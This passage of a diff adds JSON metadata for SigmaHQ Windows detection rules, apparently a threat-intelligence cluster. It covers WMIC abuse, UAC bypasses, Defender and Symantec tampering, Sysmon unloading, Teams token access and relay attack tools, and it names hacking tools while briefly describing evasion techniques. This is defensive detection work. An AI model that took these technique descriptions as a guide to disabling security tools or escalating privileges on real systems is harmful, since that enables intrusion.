"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ] + }, + "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", + "value": "Suspicious WMIC Execution" + }, + { + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wmic_proc_create.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "value": "Suspicious WMIC Execution - ProcessCallCreate" + }, + { + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/01/30", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1355171195654709249", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "value": "Wmic Uninstall Security Product" + }, + { + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut)", + "creation_date": "2021/10/21", + "falsepositive": [ + "Legitimate usage of the uncommon Windows Work Folders feature." 
+ ], + "filename": "proc_creation_win_susp_workfolders.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/elliotkillick/status/1449812843772227588", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", + "value": "Execution via WorkFolders.exe" + }, + { + "description": "Detects code execution via the Windows Update client (wuauclt)", + "meta": { + "author": "FPT.EagleEye Team", + "creation_date": "2020/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" + ] + }, + "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "value": "Windows Update Client LOLBIN" + }, + { + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + ], + "tags": "No established tags" + }, + "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "value": "Suspicious Windows Update Agent Empty 
Cmdline" + }, + { + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zipexec.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1451237393017839616", + "https://github.com/Tylous/ZipExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", + "value": "Suspicious ZipExec Execution" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "value": "Zip A Folder With PowerShell For Staging In Temp" + }, + { + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Janantha 
Marasinghe (https://github.com/blueteam0ps)", + "creation_date": "2021/02/02", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_sus_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", + "value": "Suspicious Auditpol Usage" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "proc_creation_win_sysinternals_eula_accepted.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", + "value": "Usage of Sysinternals Tools" + }, + { + "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/16", + "falsepositive": [ + "Legitimate use of PsService by an administrator" + ], + "filename": "proc_creation_win_sysinternals_psservice.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + 
"refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "value": "Use of Sysinternals PsService" + }, + { + "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "value": "SharpEvtMute EvtMuteHook Load" + }, + { + "description": "Detect possible Sysmon driver unload", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_driver_unload.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" + ] + }, + "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "value": "Sysmon Driver Unload" + }, + { + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a 
process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_exploitation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", + "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://twitter.com/filip_dragovic/status/1590104354727436290", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + ], + "tags": "No established tags" + }, + "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "value": "Suspicious Sysmon as Execution Parent" + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", + "value": "UAC Bypass via Event Viewer" + }, + { + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + 
], + "filename": "proc_creation_win_sysnative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + ], + "tags": [ + "attack.t1055" + ] + }, + "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "value": "Process Creation Using Sysnative Folder" + }, + { + "description": "Detects a Windows program executable started from a suspicious folder", + "meta": { + "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "creation_date": "2017/11/27", + "falsepositive": [ + "Exotic software" + ], + "filename": "proc_creation_win_system_exe_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/GelosSnake/status/934900723426439170", + "https://asec.ahnlab.com/en/39828/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "value": "System File Execution Location Anomaly" + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "value": "Tamper Windows Defender Remove-MpPreference" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "proc_creation_win_tap_installer_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "99793437-3e16-439b-be0f-078782cf953d", + "value": "Tap Installer Execution" + }, + { + "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "meta": { + "author": "Ilya Krestinichev, Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_taskkill_sep.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.exploit-db.com/exploits/37525", + "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + 
"https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", + "value": "Taskkill Symantec Endpoint Protection" + }, + { + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/01/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_task_folder_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/subTee/status/1216465628946563073", + "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" + ] + }, + "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "value": "Tasks Folder Evasion" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "value": "Suspicious Command With Teams Objects Pathes" + }, + { + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_termserv_proc_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", + "value": "Terminal Service Process Spawn" + }, + { + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate files with these rare hacktool names" + ], + "filename": "proc_creation_win_tools_relay_attacks.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1557/001/", + 
"https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://github.com/ohpe/juicy-potato", + "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", + "value": "SMB Relay Attack Tools" + }, + { + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "value": "UAC Bypass Tools Using ComputerDefaults" + }, + { + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nircmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + 
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "value": "NirCmd Tool Execution" + }, + { + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "value": "NirCmd Tool Execution As LOCAL SYSTEM" + }, + { + "description": "Detects the use of NSudo tool for command execution", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nsudo_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", + "value": "NSudo Tool Execution" + }, + { + "description": "Detects PsExec service execution via default service image name", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tool_psexec.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", + "value": "PsExec Tool Execution" + }, + { + "description": "Detects the use of RunXCmd tool for command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_runx_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.d7xtech.com/free-software/runx/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "93199800-b52a-4dec-b762-75212c196542", + "value": "RunXCmd Tool Execution As System" + }, + { + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + 
"meta": { + "author": "frack113", + "creation_date": "2022/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tor_browser.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ] + }, + "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "value": "Tor Client or Tor Browser Use" + }, + { + "description": "Detect use of TruffleSnout.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_trufflesnout.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/dsnezhkov/TruffleSnout", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "value": "Launch TruffleSnout Executable" + }, + { + "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the utilities by legitimate user for legitimate reason" + ], + "filename": "proc_creation_win_trust_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", + "value": "Domain Trust Discovery" + }, + { + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", 
+ "value": "UAC Bypass Using ChangePK and SLUI" + }, + { + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "value": "UAC Bypass Using Disk Cleanup" + }, + { + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of cmstp.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_cmstp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" + ] + }, + "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", + "value": "Bypass UAC via CMSTP" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "value": "UAC Bypass Using Consent and Comctl32 - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 